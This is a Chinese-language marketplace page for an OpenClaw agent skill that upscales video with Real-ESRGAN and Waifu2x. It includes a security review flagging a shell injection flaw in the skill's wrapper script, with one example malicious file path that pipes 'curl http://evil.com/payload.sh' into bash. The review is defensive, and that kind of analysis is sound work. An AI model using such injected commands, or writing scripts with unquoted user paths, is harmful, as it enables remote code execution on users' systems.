← 返回 Skills 市场
nightvibes3

AI Video Upscale

作者 NightVibes3 · GitHub ↗ · v1.4.0
cross-platform ⚠ suspicious
828
总下载
0
收藏
1
当前安装
4
版本数
在 OpenClaw 中安装
/install video-upscale
功能描述
AI-powered video upscaling with Real-ESRGAN and Waifu2x. Use when user asks to enhance, upscale, improve video quality, make HD/4K. Supports anime and real f...
安全使用建议
This skill appears coherent with its purpose: it runs local upscaling tools (Real-ESRGAN / Waifu2x) via a wrapper script. Before installing or running: (1) verify the GitHub release URLs and checksums for the prebuilt binaries you download, (2) inspect and run the script in a controlled environment—it will extract many frames and can use lots of CPU/GPU, disk, and memory, (3) note the default cache path (~/.openclaw/cache/video-upscale) and the 5-minute max duration limit in the script (adjust if you expect longer inputs), and (4) ensure you trust the prebuilt binaries (they run as local executables). If you want additional assurance, build the upscalers from source or run them in an isolated container/VM.
功能分析
Type: OpenClaw Skill Name: video-upscale Version: 1.4.0 The skill is classified as suspicious due to a critical shell injection vulnerability in `scripts/upscale_video.sh`. User-controlled inputs like `INPUT_PATH` and `OUTPUT_PATH` are directly used in `ffprobe` and `ffmpeg` commands without proper sanitization or quoting, allowing for arbitrary command execution (RCE). For example, a malicious `filepath` could execute `curl http://evil.com/payload.sh | bash`. The `SKILL.md` defines the interface that passes these potentially untrusted inputs to the script. Additionally, the script allows overriding paths to external tools via environment variables, which could be abused in a compromised environment.
能力评估
Purpose & Capability
Name/description, SKILL.md, INSTALL.md and the provided script all focus on local video upscaling. Declared required binaries (ffmpeg, bc, md5sum) and downloads of Real-ESRGAN/Waifu2x releases are consistent with the stated functionality.
Instruction Scope
Runtime instructions and the script operate on local files only: extract frames, call local upscaling binaries, re-encode, and cache results. The script does not read unrelated system files, network endpoints, or secret env vars. It does create a cache directory under ~/.openclaw by default.
Install Mechanism
There is no automated install spec in the skill bundle (instruction-only), but INSTALL.md instructs the user to curl GitHub release zip files and unzip them into ~/video-tools. Those are standard GitHub release URLs (traceable) but downloading and executing prebuilt binaries always carries the usual trust risk—user should verify release source/checksums before running.
Credentials
No credentials or sensitive env vars are requested. INSTALL.md suggests optional environment variables that only point to local tool locations and a cache path. The environment access is proportional to the task.
Persistence & Privilege
Skill does not request always:true, does not modify other skills, and is run on-demand. It writes cache under a user-local path and creates temporary working directories; this is within expected scope.
如何使用
  1. 确保已安装 OpenClaw(本地或 Docker 部署)
  2. 在对话框中输入安装命令:/install video-upscale
  3. 安装完成后,直接呼叫该 Skill 的名称或使用 /video-upscale 触发
  4. 根据 Skill 的参数说明提供必要输入,即可获得结构化输出
版本历史
v1.4.0
- Added required dependencies ffmpeg, bc, and md5sum to metadata for clearer installation requirements. - Documentation updated to reflect these dependencies in SKILL.md.
v1.3.0
- Renamed skill to "ai-video-upscale" and set version to 1.0.0 - Added author information to metadata - Updated usage instructions to include installation path and clarify PATH usage - No changes to core functionality or parameters
v1.0.1
- Added initial support for AI-powered video upscaling using Real-ESRGAN and Waifu2x. - Supports both anime and real-life footage with automatic mode selection. - Offers fast (2x) and high (4x) upscaling presets. - Includes progress tracking and job isolation features. - Responds to common user requests like "upscale," "make HD/4K," and "enhance video quality."
v1.0.0
- Initial release of the Video Upscale Skill. - AI-powered video upscaling using Real-ESRGAN and Waifu2x for both anime and real footage. - Supports user prompts to enhance, upscale, or improve video quality, including HD/4K requests. - Includes progress tracking and job isolation for each upscaling task.
元数据
Slug video-upscale
版本 1.4.0
许可证
累计安装 1
当前安装数 1
历史版本数 4
常见问题

AI Video Upscale 是什么?

AI-powered video upscaling with Real-ESRGAN and Waifu2x. Use when user asks to enhance, upscale, improve video quality, make HD/4K. Supports anime and real f... 它是一个面向 Claude Code / OpenClaw 的 AI Agent Skill 插件,目前累计下载 828 次。

如何安装 AI Video Upscale?

在 OpenClaw 或 Claude Code 对话框中运行命令「/install video-upscale」即可一键安装,无需额外配置。

AI Video Upscale 是免费的吗?

是的,AI Video Upscale 完全免费(开源免费),可自由下载、安装和使用。

AI Video Upscale 支持哪些平台?

AI Video Upscale 跨平台运行,可在任意部署了 OpenClaw / Claude Code 的环境中使用(cross-platform)。

谁开发了 AI Video Upscale?

由 NightVibes3(@nightvibes3)开发并维护,当前版本 v1.4.0。

💬 留言讨论